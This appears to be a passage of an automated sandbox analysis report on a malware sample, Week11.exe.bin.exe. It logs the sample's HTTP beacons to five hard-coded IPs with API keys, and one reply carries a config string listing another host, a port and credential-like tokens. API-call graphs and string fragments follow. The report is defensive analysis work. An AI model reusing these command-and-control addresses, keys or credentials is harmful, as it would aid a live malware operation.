                              Nov 10, 2024 16:48:51.808326960 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:48:51.813131094 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:06.824384928 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:06.829327106 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:11.808258057 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:11.808562040 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:11.813354015 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:21.090476990 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:49:21.095360994 CET8049878188.130.206.243192.168.2.7
                              Nov 10, 2024 16:49:21.106237888 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:21.111093998 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:21.344321966 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:21.391972065 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:32.047553062 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:32.047749043 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:32.052767038 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:47.064090014 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:47.068999052 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:51.095213890 CET4987880192.168.2.7188.130.206.243
                              Nov 10, 2024 16:49:51.100090981 CET8049878188.130.206.243192.168.2.7
                              Nov 10, 2024 16:49:51.361166954 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:51.366077900 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:51.600106955 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:51.647985935 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:52.286365032 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:49:52.286612034 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:49:52.291557074 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:50:07.303545952 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:50:07.308449984 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:50:12.525355101 CET1207249893185.157.213.253192.168.2.7
                              Nov 10, 2024 16:50:12.525648117 CET4989312072192.168.2.7185.157.213.253
                              Nov 10, 2024 16:50:12.530455112 CET1207249893185.157.213.253192.168.2.7

                              HTTP Request Dependency Graph

                              • 46.8.232.106
                              • 46.8.236.61
                              • 93.185.159.253
                              • 91.212.166.91
                              • 188.130.206.243

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.74969946.8.232.106807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:10.071127892 CET334OUTPOST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: imeRTf84
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:10.942055941 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:10 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.74970046.8.236.61807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:11.032814980 CET333OUTPOST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: zmPxtJCV
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:11.878170967 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:11 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.74970193.185.159.253807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:11.905344009 CET336OUTPOST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: qp5sEuke
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:12.779258966 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:12 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.74970291.212.166.91807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:12.807813883 CET335OUTPOST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: n9HFL5dt
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:13.719944000 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:13 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.749703188.130.206.243807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:13.962546110 CET337OUTPOST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: 5tsXyW0C
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:15.247839928 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:15 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              5192.168.2.74985446.8.232.106807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:45.278079987 CET334OUTPOST / HTTP/1.1
                              Host: 46.8.232.106
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: TM5rMihx
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:46.231353045 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:46 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              6192.168.2.74986046.8.236.61807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:46.260587931 CET333OUTPOST / HTTP/1.1
                              Host: 46.8.236.61
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: 0oN7jWnU
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:47.175920963 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.74986693.185.159.253807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:47.203821898 CET336OUTPOST / HTTP/1.1
                              Host: 93.185.159.253
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: fOauRxk0
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:48.065321922 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:47 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.74987291.212.166.91807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:48.092874050 CET335OUTPOST / HTTP/1.1
                              Host: 91.212.166.91
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: RLinuieK
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:48.975406885 CET183INHTTP/1.1 429 Too Many Requests
                              Content-Type: text/plain; charset=utf-8
                              X-Content-Type-Options: nosniff
                              Date: Sun, 10 Nov 2024 15:48:48 GMT
                              Content-Length: 18
                              Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                              Data Ascii: Too many requests


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.749878188.130.206.243807116C:\Users\user\Desktop\Week11.exe.bin.exe
                              TimestampBytes transferredDirectionData
                              Nov 10, 2024 16:48:49.016057968 CET337OUTPOST / HTTP/1.1
                              Host: 188.130.206.243
                              User-Agent: Go-http-client/1.1
                              Content-Length: 198
                              X-Api-Key: C4HDGxuS
                              Accept-Encoding: gzip
                              Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 16 21 1a 07 1a 13 29 01 03 1e 2f 00 3a 5f 3e 10 3b 56 11 0e 08 1e 22 09 36 3e 5b 08 5d 14 27 07 0b 2e 07 06 06 1d 5f 12 5b 35 07 5d 2b 0b 1c 57 29 1b 22 56 3c 0e 11 58 1c 2d 21 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 2f 27 24 56 3f 2d 1a 17 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 22 39 22 0c 3c 38 5f 03 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 54 16 19 48 0a 2a 15 5c 38 08 05 45 4f 4d 03 02 5c 45 59 4d 5a 00 0b 04 57 09 5c 50 0c 5e 53 5c 5c 52 0a 54 01 5a 5d 53 50 53 50 5b 5b 54 5d 51 53 58 58 57 4b 1a
                              Data Ascii: M*L\K!)/:_>;V"6>[]'._[5]+W)"V<X-!EOM:DSE/'$V?-LJK9AUL"9"<8_EOM9L\KWTH*\8EOM\EYMZW\P^S\\RTZ]SPSP[[T]QSXXWK
                              Nov 10, 2024 16:48:51.090313911 CET556INHTTP/1.1 200 OK
                              Date: Sun, 10 Nov 2024 15:48:50 GMT
                              Content-Length: 438
                              Content-Type: text/plain; charset=utf-8
                              Data Raw: 31 38 35 2e 31 35 37 2e 32 31 33 2e 32 35 33 3b 31 32 30 37 32 3b 68 65 61 58 74 54 34 34 74 64 4b 69 70 6d 5a 68 3a 55 31 4b 2f 5a 46 53 2f 42 35 35 34 57 43 6a 36 48 37 39 2e 70 6f 77 38 42 70 56 2e 68 51 72 32 70 62 45 33 41 62 4a 32 68 4b 44 2e 63 57 30 31 53 53 63 30 68 41 5a 36 6a 37 62 2c 4e 56 79 68 74 55 74 74 77 52 39 74 35 56 78 70 42 37 55 3a 51 4f 6f 2f 63 50 30 2f 76 6f 6e 34 30 72 68 36 35 69 6c 2e 5a 65 42 38 4a 33 57 2e 7a 65 33 32 52 72 36 33 43 66 72 36 61 77 45 2e 51 78 38 36 38 37 43 31 42 4a 4f 2c 58 4b 6b 68 49 38 5a 74 45 76 79 74 75 46 57 70 63 68 50 3a 32 6c 57 2f 77 76 6e 2f 5a 57 52 39 4d 46 7a 33 63 4c 4e 2e 59 4b 64 31 56 4e 4b 38 54 4e 64 35 61 78 75 2e 53 79 59 31 66 43 75 35 54 43 61 39 4e 5a 53 2e 38 44 33 32 71 78 71 35 43 46 53 33 56 6a 70 2c 4c 58 57 68 45 51 77 74 36 72 4a 74 6c 6b 56 70 52 46 4b 3a 76 4e 50 2f 35 77 52 2f 37 34 6e 39 66 4f 77 31 6f 6f 4b 2e 76 43 53 32 75 42 69 31 36 58 61 32 39 6d 6a 2e 73 42 70 31 31 78 76 36 52 51 47 36 69 55 53 2e 42 39 64 [TRUNCATED]
                              Data Ascii: 185.157.213.253;12072;heaXtT44tdKipmZh:U1K/ZFS/B554WCj6H79.pow8BpV.hQr2pbE3AbJ2hKD.cW01SSc0hAZ6j7b,NVyhtUttwR9t5VxpB7U:QOo/cP0/von40rh65il.ZeB8J3W.ze32Rr63Cfr6awE.Qx8687C1BJO,XKkhI8ZtEvytuFWpchP:2lW/wvn/ZWR9MFz3cLN.YKd1VNK8TNd5axu.SyY1fCu5TCa9NZS.8D32qxq5CFS3Vjp,LXWhEQwt6rJtlkVpRFK:vNP/5wR/74n9fOw1ooK.vCS2uBi16Xa29mj.sBp11xv6RQG6iUS.B9d9TKh1aWa,pWVh5pktvPct8Orpm8C:CQc/GCy/hwW14yl8JZa8cmi.tLE13PZ30xO0TuR.Dd72mNq0Pv56WPp.eyb2Uji4Cx73zKb
                              Nov 10, 2024 16:49:21.090476990 CET6OUTData Raw: 00
                              Data Ascii:
                              Nov 10, 2024 16:49:51.095213890 CET6OUTData Raw: 00
                              Data Ascii:


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              System Behavior

                              General

                              Target ID:1
                              Start time:10:48:08
                              Start date:10/11/2024
                              Path:C:\Users\user\Desktop\Week11.exe.bin.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\Week11.exe.bin.exe"
                              Imagebase:0x400000
                              File size:8'848'896 bytes
                              MD5 hash:4FBC4F26E90324C3B535943452460761
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:low
                              Has exited:false

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:0.1%
                                Dynamic/Decrypted Code Coverage:2.3%
                                Signature Coverage:6.8%
                                Total number of Nodes:44
                                Total number of Limit Nodes:6
                                execution_graph 165191 415e41 165192 415d89 NtQueryDefaultLocale 165191->165192 165195 415f63 165192->165195 165197 416124 165192->165197 165194 415fee 165205 416050 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 165194->165205 165195->165194 165199 416045 165197->165199 165203 416675 165197->165203 165199->165197 165206 41667d NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 165199->165206 165201 41750e NtQueryDefaultLocale 165204 417525 165201->165204 165202 416990 165202->165201 165203->165202 165207 416e88 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 165203->165207 165208 4074c4 165209 4074cd VirtualProtect 165208->165209 165210 4074fb 165209->165210 165211 41ee27 165212 41ee3e 165211->165212 165213 41ee65 165212->165213 165215 41ee6c 15 API calls 165212->165215 165215->165213 165216 41ec2a 165217 41ec4f VirtualProtect 165216->165217 165219 41ed56 165217->165219 165225 41ed1f 165217->165225 165220 41ed81 165219->165220 165226 41ed8b 15 API calls 165219->165226 165227 41eed0 15 API calls 165220->165227 165223 41eec9 165228 41ef1a 15 API calls 165223->165228 165227->165223 165229 41d75c 165230 41d793 165229->165230 165233 41d787 165229->165233 165236 41d7ab 165230->165236 165232 41d819 165232->165232 165233->165232 165234 41d836 VirtualAlloc 165233->165234 165235 41d868 165234->165235 165239 41d7bb 165236->165239 165241 41d7ec 165239->165241 165240 41d819 165240->165240 165241->165240 165242 41d836 VirtualAlloc 165241->165242 165243 41d868 165242->165243 165244 31fc670 ReadFile 165245 42026d VirtualProtect 165246 420274 165245->165246 165246->165246

                                Executed Functions

                                Function 00414EC6 Relevance: 49.7, APIs: 2, Strings: 26, Instructions: 680COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID:
                                • String ID: 9FK4$9HHF$L$L$L$L$W$W$a$a$a$a$b$b$d$d$i$i$o$o$r$r$r$r$y$y
                                • API String ID: 0-3384230818
                                • Opcode ID: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
                                • Instruction ID: 0de00d26f1fb9f508684012c5907b879b538ff4cc18a3d4bb959296227bf3df1
                                • Opcode Fuzzy Hash: 68955427dbf68eb0547421ae42c10176993060677c0034ffc2d3f8c911572dd9
